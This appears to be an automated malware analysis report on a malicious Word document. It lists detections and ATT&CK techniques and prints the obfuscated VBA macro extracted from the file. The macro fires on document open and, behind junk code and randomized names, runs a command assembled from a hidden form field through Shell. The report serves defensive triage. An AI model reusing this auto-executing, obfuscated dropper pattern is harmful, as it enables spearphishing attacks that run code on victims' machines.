MALICIOUS
252
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1566.001 Spearphishing Attachment
The sample contains VBA macros, including an auto-execute macro named 'autoopen'. Heuristics indicate a 'Shell()' call within the VBA code, suggesting it attempts to execute external commands or download additional payloads. The ClamAV detection and generic malware heuristic further support its malicious nature. The VBA script itself is heavily obfuscated, making it difficult to determine the exact payload or destination.
Heuristics 9
-
ClamAV: Doc.Malware.Generic-6786413-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Generic-6786413-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
Set ZcmUsibLjkCjGXpPfwVQ = abjSZlJEZzZjfJh tADaJcG = Array(qCDtM, siZiMLOzd, RTHcHGHX, Interaction.Shell(tMUuDDDScz, wGWANA), wjbEi) Select Case sLsANPmMRzjknOdXM -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox" Sub autoopen() QWKuwsv -
Suspicious cmd.exe invocation with execution flag high SC_STR_CMDSuspicious cmd.exe invocation with execution flag
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/officeDocument/2006/bibliography In document text (OLE body)
- http://schemas.openxmlformats.org/officeDocument/2006/customXmlIn document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 9881 bytes |
SHA-256: 07f3c12b9e7f55947718ee262803c2e05b5588632317d887736f57eabe253d74 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
266 of 310 identifiers look randomly generated (e.g. 'LmddEIUwFqOWwuTbGbWIRdsO') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "rUPPOfMwM"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox"
Sub autoopen()
QWKuwsv
End Sub
Attribute VB_Name = "qScIRduGDDlRdq"
Function QWKuwsv()
On Error Resume Next
Select Case VdZvwGHLTiPjXudMA
Case 268361738
AoZPsKHLnLFVmrqTmIr = KaPpLdBwpXtdYAd
wNhlruUANIdshaqDIiO = Log(ZjDOIIVPRczlNOWZbGP)
GPbDAIRPhqUqlECMJ = 123348243
iZFilKsfSERcCTzTKIAO = qGhaHHzJMJPIdjpBjpsIdzKQ
Case 93549604
WmksEJEcsTXIdDsWF = 305435403
TYmJSiSIGWqvRM = Log(kNYTFFEAnWiXLpPHtQOutj)
SOlBzGBYFvoSfzmpwPYw = 256411929
GGSqPziDSvAkFFTEGumwYc = Log(XkJHbRiUkpiIiiGqEt)
End Select
Set dsRusjVsIiMoPi = vGFpDlnaQuazpVzDhFVwi
Select Case WMKtjoRwmuvKzTqwQ
Case 329390411
OMKqjoYiDqKFvicqkTMEDu = iWJdFmfXwPazBLVdFHFOIbp
bWdFcEtmUScUXK = Log(wXSLpViaiPpGwwflH)
JBjJauuVoijjAGvpIrpP = 339806470
swwqnwwopjUnNIjnzYRT = DrvOiLHpowrhiImKjHwZ
Case 1435083
COMtmFVtQzfwoEDbEmowBj = 193339947
jzwcNRVujOojBpY = Log(TuftBfTiHICJlB)
SlGKmItjzclRaQWZPOmiHE = 235439647
DjOUEOMIfaVvvfl = Log(aNfQQOtRlimuwWhOBBGGuYb)
End Select
Set QcmAuaikcsDtYSoomwiWb = KItHutYfzClvAnctX
Select Case ZDMPtSUwqwjwzsFZhJHFQmm
Case 65934951
LTpXslboYXIEVza = VDmPVTWwifuhuanQCGiwiaz
IHbVzVMLjOviAunr = Log(qpNrtuwjrBPPcMvGbHNsBBNS)
BffFPISqAokkTOMclFUzv = 27499119
zcZnZzvpcuIsPS = btwZbXKVHsBPPvtVmwcf
Case 190807886
VsrEwIqLWzKHibAWcipHRuY = 233709430
tjZVvmnBkXEhWZBivWDF = Log(RSUQUwpVZaTHYFZ)
qaKWFtDwoFFncVXUd = 154266677
REFbnzfLzkazTcNFwsi = Log(YOXbOtBtDCwdBi)
End Select
Set MlzWZahFLOHmLOQ = cuUDCjdMuvlIulwwpUB
Const wGWANA = 0
Select Case WIEtjBTjXDNRin
Case 227496870
shtpzwmWXsfHXSTnKb = uCsrPBrkSjbzrjufkbzCX
hWnVLJEjZHCDnQAqin = Log(OTqvsoadmiMLZMY)
VDtpifiGUzosifuzLu = 63648050
ravhkfSBNwcqPv = nkwZiljbvzhzGnOziDWc
Case 312528828
MECNjsYUwdiBGNN = 140252576
QIwAhCjLNwwwnsTifXt = Log(UFqCaBEQFhBmJbGUwI)
CVCStcWKlPSbpUwGLRvZ = 212703578
QFjzJoLmwmXsqBSmzaDqSBnF = Log(SKVvDAiwDFwmwTiz)
End Select
Set QjEwdznYUVWpfOSbkqdprulp = nvVAAHUrTkHAPpNhWjfLIXq
Select Case AUwlkfSqVMRfNPLFaYSmjB
Case 95984365
BWUFFlspbrRjOHoszicrYa = vUBldutCzGKkOL
kkTbEVwfqSjanAYW = Log(aSYkEAPvhoSaEXajm)
sYwWizpKStTGBbjuKwncjjEj = 147125346
fEmvJtACfwSDkavuiVbbn = qJMitJRJTQABSkXWjaFzwlb
Case 40211087
NhlBiFvuoOcifArk = 144337737
CDjILWLmBVnuFhGRjcjH = Log(KFGdVuoEZNOaGZCdEWOqw)
ZGtIvbNTPENtsw = 184911057
pcWhbIZUzIEobFRRoGjA = Log(NzMrFwJMMhDBZhmTOcQjZ)
End Select
Set mXYsJnwElSbvbcJq = JQImbAnBYizadPUKDM
Select Case KLMTkrboBnKnlRa
Case 321897390
ifilRAPwoIBEsWvpUaE = YFzDbjXEZAuZOpPkiXtKzUv
ajJROwQrVEBdhfJlcLZoN = Log(pCHLGzhuuDJOdsWGpaj)
EKnlCDNIhmvHVw = 300629582
KDsTJbJwUTCROWV = FJXfPVIDjZMIICtiwQwliPuc
Case 636384
RjBwtLQwCLaNrovokjOBpS = 171842369
SzZkQpPvfZEZCmfBsL = Log(hDkZIqtfKNwzwJddwmffMwfh)
kVmzENIdSsThYQtXK = 29557487
jZFQYJjOMjnkXDHXUHhGA = Log(WjQKwXVmICswBsfFNoUwvz)
End Select
Set IviRtZQczhqDYzONLtaX = sZCOsOtslBuYBIORGcNsZ
Select Case roDbDVpikOJjOzfCoHtjROl
Case 190986733
BdSikVfQzIGCpKKVP = cPCtulaHSFWadDaMBr
zAtdSPrYAwwjOCqINM = Log(jjIcDatYiDccISz)
WjlkdDNZJVVIYnuNA = 301892010
rrYpCYrMVYWnRQm = ZbcdfTiSiFlArIObPJ
Case 41015626
zuiLmqrBnhErlTVmYQd = 159555097
GGznqVMJuYHKNWf = Log(QqpbjfBBtOXncDwjhPrnlYw)
fssIwjYwqtIZnzbaFv = 298656969
zZjrZbczisGruUwonsF = Log(qbzjuZskoRhpfUWF)
End Select
Set BiUEaRznQiSAnnNq = lWczwAirJNKQMZwqdmKk
Select Case qQANPNEsEkXSdSfnl
Case 329173713
KpzCKdMLiNpHId = iGRzZzNFMLTZIuju
fHnasNqkDBZfOcPoTkYWnY = Log(zjkrqEDQvSCbAp)
psbMWznaziEkpKLYwGEqr = 53747068
zjzliMMAOzkvfubCGJ = mIlTOGjuDUvzshW
Case 181466487
WLJNliplEPfdXEwjiVOO = 83940220
fuSJfSzsOJTufuAvBZviJ = Log(EQfQzSJLINTmjOubCXlMAWK)
ZDjnUoSiboqCdPVhiCBF = 176573873
NlAZXYwwqiFCqtlWrTvpKsY = Log(wnBEiwUECjpvmuQthiwHwbY)
End Select
Set vMLhKliVMIbkWsSrNBA = DpjwCBHjuRvWOaIR
Select Case LmddEIUwFqOWwuTbGbWIRdsO
Case 19775909
RHZWmbLODvwUrplQSkcid = IqnzrdiitPaXrMWjDmKiqYdm
hXAKHmUEUwjjnkifUBitU = Log(YtjhpYvGkMBPKGhYldGTWOnz)
CcCWWusQiwHaawvJO = 90222023
iYZbzvPFnBbKGjRnvs = NSIzbHawLjKJIAQRrcAFa
Case 49117970
EOHoAqJJARizEZYzUXzEYc = 284798461
JpSZKvmJGdDkUSZHBX = Log(sdAMsSffidDQcXnf)
YkzEiVtaVodCzpDB = 118082263
pIdaGfPEjDNbMjnOjRYGOIHm = Log(iBdknAPKZwWhwdUoZo)
End Select
Set NubwOiFlcLkhBrDbdmTsDw = niQhlnERoTQYbDEOB
Select Case nWzvADCoYIkmwtnROK
Case 176096445
KBUosBozXkIiMjn = NJVshMfQWwQqSoPLDLL
CLDzPCRoAFZPFPEFohYzW = Log(SvkwhjVwaBVCWB)
WdfurQQXAkDkJWW = 260218827
PwsIOQViTDfYuDtC = SDsCfnCYjNiwLZENImXIzHMK
Case 82752683
MlwGjJhJESuKkLqjfDr = 233356103
daKmQWtCLqiqHaQ = Log(cjURBVmSzCLSNcJTdQi)
oUQnoHtbMUdlZKCW = 151012705
FHnroOLboihPNqrFl = Log(QjducLGdZZsDZmw)
End Select
Set LbXwjBcMTKtzHmuU = uGqpLfblLoljkJuSCfQ
Select Case jfUmiHBNmsQSdQiB
Case 252145989
NoTzOilhiLlSbXlSZcJzFKq = lswszZXEYNQZtiQmAwc
bUQsjLqCsmnCzuLVlthFoj = Log(OHLZqLWzIiAzRcDLniULmZN)
wXuBGOXBvaClUmArWmf = 135237765
ztthiuWTVHpujaTQVttKzCra = qBidpzusfBdBTYUBh
Case 171879499
MqlLjaAtlJzuCTOrs = 258115972
fIvBEZqOBVYJRcZNbFpCCoG = Log(jhGaiEjcOruKRpj)
qLzYMAfScFnlCknqBmSWSP = 213986383
owvahPwmZCMrpiwiBnzcRuZd = Log(EIiXJUafBjPFFl)
End Select
Set JAMAYwATqjViRDft = RWdHRPPilMowjdwCkT
tMUuDDDScz = rUPPOfMwM.TextBox1 + IbVqsniI + EHDoon + lzRmkMVJ + aScbbt + chkPLz + SHopNud + kHSWqTf + hoQJVY + NbrGfu + uNURLhDJ
Select Case rffpIcvPWkoEoWuX
Case 301760683
zRFqkdcNjsonNUufdkmoVWD = hKjItsHjmVJWGB
CNuwCaiWTJItKkFYaNEIatT = Log(olIBsLYZcpjaaaBawn)
wkwzwhziJBsUJtbIR = 122720987
iIljQUAiwAMdKmcVipnMU = cOXjUahzSjHRJHNBhcvCwiw
Case 157697725
ijYsTdGMjjWMhzazzidWs = 189240107
HhHLQRvtRzBltIHwFA = Log(ZaqoAdVFzATBpG)
QKMSqvonFNfNjosj = 153965485
oDvRsGivMwszzMfjsw = Log(nKJlnkbVPpQHRwjACPzRGk)
End Select
Set iruHPSizwvzkKfSHjRkSGvo = BRLdTsijCQatsdMDhsU
Select Case QVOwOLGmVnrmfI
Case 341167931
LpXpjVOzrHEqASNVjNnK = jHszsEKwhiBsdus
lRvGPGGHQmDZWCSV = Log(VbifsrQDAJZDzWYVIwvrDt)
AlhGBlcfQjDISKhsaiDO = 323767298
DSPiENEWdlbwhtLkPSYiI = tOFKaFUNAifShOrWjO
Case 176538295
DSjUdnhqPlqSZhYAZtnwBPk = 321923028
OMwtslJDOTahlhmXi = Log(OnNtApqwnbbsnhjBObkwWAhO)
NzSoMAbWRWJFULHC = 314750145
icVftwjSLmhbOGwimrYIabAW = Log(LavuQduaCzmpiEUEtp)
End Select
Set oqHCGmYPinXHbzJhXoYvIn = MHMtEmDEjlLhfD
Select Case IKjGiHwCIVRsvNQHdtqsqjB
Case 192651035
fjkWkXDZGRDazMQfuibFWa = rosqsKDcJDRDaOfXwOS
wMjdhZNvwZXSEItirjLODp = Log(XhIqRPKdrDlciHOJSzHijjw)
SUwfRCElGSJwYjvjnwfOSfOb = 190083729
tQvKKriKXwSiLozzVM = SkiCaqnAkfnGVDuJnqwHSNOL
Case 339633327
IlrOSJCdKmKOUUXqw = 199423524
qzbQiMJZEfFWXCMhCJVNd = Log(ssHzZVckbPkaJR)
UMCIkwzFQnMImVhcRHmEi = 59532182
mozTEpmwsvAhzSEtFvnq = Log(NMpOumSTXMwLjPUm)
End Select
Set tPirTMmnkKMNjJvSTZbH = KDTcVjBWQCkGaCY
Select Case NwcORuDfbQLsPvofaM
Case 174632917
RCQMScmGvSRjpjrk = zJhEJUZhSKiVGBaP
FLjPvoIwjIwcDjED = Log(aCsHIiqfAREkpRrTcb)
EuEVZHZLbFPbiSkaYWFz = 192254998
kvWDLurHIaIYwbWhSziWPZ = qaSEqTzWdCPJIzVwfTTzo
Case 130189781
TIEqDGOGaKKjdsp = 4647096
KEiVjSNizDCCwcwWUzwlct = Log(PwowzSrDpTimkpjjq)
IGCLDihOJJtsOMRoOZuTPPF = 339489497
jRqLjkQGuTnNDsKR = Log(JiKzESVvaKoWctBDwTNrC)
End Select
Set ZcmUsibLjkCjGXpPfwVQ = abjSZlJEZzZjfJh
tADaJcG = Array(qCDtM, siZiMLOzd, RTHcHGHX, Interaction.Shell(tMUuDDDScz, wGWANA), wjbEi)
Select Case sLsANPmMRzjknOdXM
Case 139368420
mzQAZJZjYkvXBUQ = XYnwzrDEaELjLOkESIXRb
TrofNcVciQWhGzZW = Log(vvMZVzpYKzrEtzz)
MFvKUdbiwWvMiIl = 206634134
AbVOlwtwHDciXoSXbuudMnRU = awBdtBOLItWdraGCLMaz
Case 24918761
hdpDOqBjMKBkLzrVNBN = 125216003
vwtjTnbAarVazQYoq = Log(XJYjLcGPHKqzYlkMmhvTuD)
jlSjKLiShXNqJqOkRdD = 214843742
JbTjpnirsWtUjpvtv = Log(DYrJcKvbVYwdqqWKZKzwVYEb)
End Select
Set AUWZBSrVhAIYAzIoNRFuPj = zYPltzaiTQVcpZ
Select Case oLEsjFlVKGjYukS
Case 274487950
CbBGlZCNdYhUZZsSfHUiUZ = oaXfPUXMTwZsJdwD
CfGjDAkjqFPdzHVcPMfNu = Log(tFMNWAhipjEjfpTikamzYP)
jWrEPtRSprQlAUq = 195746616
wHQiZNbfJlbFauOizcriv = oYNOrPDSKuwCBQzZJ
Case 56366749
ZFIpMOzCHDrwwpfSr = 135781368
WMbqbhJYtzfXSiPW = Log(jjAzuNwPSvzNVwHF)
mDzPhHDqDEcjYQjSSmITKbwf = 179252908
lLLXzYSTwLYzwbz = Log(qITjtfNuCLwloKES)
End Select
Set ZWrijFEOFTYuVohWBkqLsP = wRVnZjflGGJZEFf
End Function
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.